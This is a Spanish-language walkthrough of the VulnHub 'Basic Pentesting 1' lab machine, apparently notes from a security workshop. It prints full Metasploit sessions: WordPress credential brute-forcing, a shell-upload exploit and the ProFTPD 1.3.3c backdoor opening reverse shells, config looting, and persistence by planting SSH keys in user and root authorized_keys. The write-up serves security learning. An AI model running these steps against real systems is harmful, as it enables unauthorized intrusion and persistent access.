Basic pentesting 1 (Sagar Rahalkar Book)
Repaso de lo aprendido con el libro: ‘Quick Start Guide to Penetration testing de Sagar Rahalkar’
Repaso de lo aprendido con el libro: ‘Quick Start Guide to Penetration testing de Sagar Rahalkar’
Continuacion taller de ‘#Pentesting4ever’ impartido en el congreso de Seguridad informatica #Euskalhack.
Apuntes Pasados por un compañero del congreso. Muchas Gracias ;)
Libro aqui: https://b-ok.org/book/3632506/105161
1) Me descargo la maquina de https://www.vulnhub.com/entry/basic-pentesting-1,216/
2) Importo la maquina en virtualbox.
Nota: Si no puedes importar bien la maquina. renombra .ova
por .ova.tar
y extrae el disco duro csec-disk001.vmdk
Crea una maquina virtual nueba tipo Linux Ubuntu 64 y asignale el disco extraido.
3) Arranco la maquina a auditar basic_pentesting_1.ova en virtualbox
Nota2: le configuro la red como adaptador solo anfitrion.
La red de mis VM es 192.168.56.XX
(este dato puede ser diferente en tu equipo (ip a |grep global
))
Luego hago un nmap -sn 192.168.56.0/24
o nmap -sn 192.168.56.*
a ver que sale:
- #### Enumeracion
Bien. La ip es la 192.168.56.101
Segundo escaneo. mas preciso: nmap -sC -A 192.168.56.101
em50l@jejo.es$ nmap -sC -A 192.168.56.101 Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-13 13:30 CEST Nmap scan report for 192.168.56.101 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel em50l@jejo.es$
- 21 ftp ProFTPD 1.3.3c
- 22 ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
- 80 http Apache httpd 2.4.18 ((Ubuntu))
La pagina http://192.168.56.101 no dice mucho…
msf5 > curl -v http://192.168.56.101 [*] exec: curl -v http://192.168.56.101 < HTTP/1.1 200 OK < Date: Sat, 13 Jul 2019 11:43:02 GMT < Server: Apache/2.4.18 (Ubuntu) < Last-Modified: Thu, 16 Nov 2017 16:53:57 GMT < Content-Type: text/html < <html><body><h1>It works!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> </body></html>
Intento enumerar sitios http
msf5 > nmap 192.168.56.101 -p 80 --script http-enum [*] exec: nmap 192.168.56.101 -p 80 --script http-enum Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 07:48 EDT PORT STATE SERVICE 80/tcp open http | http-enum: |_ /secret/: Potentially interesting folder
Veo una subpagina llamada secret
Visito la pagina http://192.168.56.101/secret/
msf5 > curl http://192.168.56.101/secret/ |grep "<title>" [*] exec: curl http://192.168.56.101/secret/ |grep "<title>" <title>My secret blog – Just another WordPress site</title>
Es un Blog Wordpress
Un ataque de diccionario????
Voy a utilizar los siguientes diccionarios que vienen con la Kali.
cat /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
cat /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt
cat /usr/share/wordlists/metasploit/default_userpass_for_services_unhash.txt
msf5 > use auxiliary/scanner/http/wordpress_login_enum msf5 auxiliary(scanner/http/wordpress_login_enum) > show options Module options (auxiliary/scanner/http/wordpress_login_enum): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) TARGETURI / yes The base path to the wordpress application USERNAME no A specific username to authenticate as USER_FILE no File containing usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line USERPASS_FILE no File containing users and passwords separated by space, one pair per line msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.56.101 rhosts => 192.168.56.101 msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/ targeturi => /secret/ msf5 auxiliary(scanner/http/wordpress_login_enum) > set userpass_file /usr/share/wordlists/metasploit/default_userpass_for_services_unhash.txt userpass_file => /usr/share/wordlists/metasploit/default_userpass_for_services_unhash.txt msf5 auxiliary(scanner/http/wordpress_login_enum) > set verbose no verbose => false msf5 auxiliary(scanner/http/wordpress_login_enum) > run [*] /secret/ - WordPress Version 4.9 detected [*] /secret/ - WordPress User-Validation - Checking Username:'admin' [+] /secret/ - WordPress User-Validation - Username: 'admin' - is VALID [*] /secret/ - WordPress User-Validation - Checking Username:'' [*] /secret/ - WordPress User-Validation - Checking Username:'root' [*] /secret/ - WordPress User-Validation - Checking Username:'Administrator' [*] /secret/ - WordPress User-Validation - Checking Username:'sysadm' [*] /secret/ - WordPress User-Validation - Checking Username:'tech' ... ... ... [+] /secret/ - WordPress User-Validation - Found 3 valid users [+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin' [+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'ADMIN' : 'admin' [+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'Admin' : 'admin' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Veo que vale las siguienes cuenta admin admin
Si sabriamos el usuario solo habria que pasar los password
msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt msf5 auxiliary(scanner/http/wordpress_login_enum) > run [*] /secret/ - WordPress Version 4.9 detected [*] /secret/ - WordPress User-Validation - Checking Username:'admin' [+] /secret/ - WordPress User-Validation - Username: 'admin' - is VALID [+] /secret/ - WordPress User-Validation - Found 1 valid user [+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
- #### Explotacion ___
Mi primer meterpreter… :)
msf5 > use exploit/unix/webapp/wp_admin_shell_upload msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin username => admin msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin password => admin msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret/ targeturi => /secret/ msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.56.101 rhosts => 192.168.56.101 msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.56.102:4444 [*] Authenticating with WordPress using admin:admin... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /secret/wp-content/plugins/rABMkLWiXs/VZxdEQbHZV.php... [*] Sending stage (38247 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:56150) at 2019-07-13 08:09:26 -0400 [+] Deleted VZxdEQbHZV.php [+] Deleted rABMkLWiXs.php [+] Deleted ../rABMkLWiXs meterpreter > meterpreter > sysinfo Computer : vtcsec OS : Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 Meterpreter : php/linux meterpreter >
Mi segundo MeterPreter
msf5 > search ProFTPD 1.3.3c Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 5 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution msf5 > use exploit/unix/ftp/proftpd_133c_backdoor msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.56.101 msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit [*] Started reverse TCP double handler on 192.168.56.102:4444 [*] 192.168.56.101:21 - Sending Backdoor Command [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo Es58meReLTodWnUc; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "Es58meReLTodWnUc\r\n" [*] Matching... [*] A is input... [*] Command shell session 2 opened (192.168.56.102:4444 -> 192.168.56.101:56164) at 2019-07-13 13:22:04 -0400 uname -a Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux pwd /
- #### Enumeracion: Recuperacion Informacion desde meterpreter lanzo un comando de post-explotacion
meterpreter > run post/linux/gather/enum_configs [*] Running module against 192.168.56.101 [sh: 0: getcwd() failed: No such file or directory vtcsec] [*] Info: [*] Ubuntu 16.04.3 LTS [*] sh: 0: getcwd() failed: No such file or directory Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux [+] apache2.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_830881.txt [+] ports.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_621936.txt [+] my.cnf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_202572.txt [+] ufw.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_954492.txt [+] sysctl.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_281226.txt
Escalada de privilegios
Enumeracion:
- Usuarios:
ls /home
un usuario esmarlinspike
- Sys. Operativo:
cat /etc/*-release
VersionUbuntu 16.04.3 LTS (Xenial Xerus)
- Arquitectura
uname -m
=> x86_64 - servicios
netstat -ano
Nota Se Cae El shell. pruebo conset payload cmd/unix/reverse
- Usuarios:
acceso shell ssh
Creo una clave ssh con
ssh-keygen -t rsa -b 1024
la llamo id_pt (de pentesting)
desde el shell en la maquina remota. añado la llave a un usuario
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1V1D828tZFRmhrLSH38zFGW6a6zAMCUr8vyUke7fxhdijtGenlHcI7iFv80fGZ/u/S03RyzpBmfMaJ9SJreZJ3znPT9YnkOaxVew4CssMfR2W0PyqOYd+6abMyd6LisatgbKA/zFgIzT2dzhK60081OplwOMvfoGsKRPlQ40HNw== " >> /home/marlinspike/.ssh/authorized_keys
## igual hay suerte como root
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1V1D828tZFRmhrLSH38zFGW6a6zAMCUr8vyUke7fxhdijtGenlHcI7iFv80fGZ/u/S03RyzpBmfMaJ9SJreZJ3znPT9YnkOaxVew4CssMfR2W0PyqOYd+6abMyd6LisatgbKA/zFgIzT2dzhK60081OplwOMvfoGsKRPlQ40HNw== " >> /root/.ssh/authorized_keys
y…..
jejo@medion:~$ ssh marlinspike@192.168.56.101 -i id_pt debug1: Authentication succeeded (publickey). Authenticated to 192.168.56.101 ([192.168.56.101]:22). Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 19 packages can be updated. 19 updates are security updates. Last login: Sat Jul 13 15:24:03 2019 from 192.168.56.1 marlinspike@vtcsec:~$
Tachan Acceso shell….
Solucion problema url wordpress
1) en /etc/hosts poner entrada para que apunte a http://vtcsec 2)
nano /var/www/html/secret/wp-config.php
y añadir al principio
<?php
define('WP_HOME','/secret/');
define('WP_SITEURL','/secret/');